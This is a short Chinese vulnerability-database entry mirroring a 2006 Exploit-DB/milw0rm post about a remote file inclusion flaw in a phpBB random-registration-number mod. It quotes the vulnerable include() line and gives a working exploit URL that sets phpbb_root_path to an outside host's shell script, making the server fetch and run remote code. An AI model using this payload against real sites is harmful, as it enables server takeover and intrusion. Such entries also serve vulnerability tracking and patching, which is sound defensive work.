phpBB Random User Registration Number 1.0 Mod - Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055957 漏洞类型
发布时间 2006-10-07 更新时间 2006-10-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/2486
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
- phpBB RANDOm USER REGISTRATION NUMBER 1.0 File Include Vulnerability

- bd0rk || SOH-Crew

- URL: http://www.nivisec.com/downloads/phpbb/random_image_register_v100.zip

- Code: include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_random_num_reg.' . $phpEx);

[+] Exploit: /includes/functions_num_image.php?phpbb_root_path=http://[target]/Shell?

Gr33tings: str0ke, TheJT, Lu7k, x0r_32

# milw0rm.com [2006-10-07]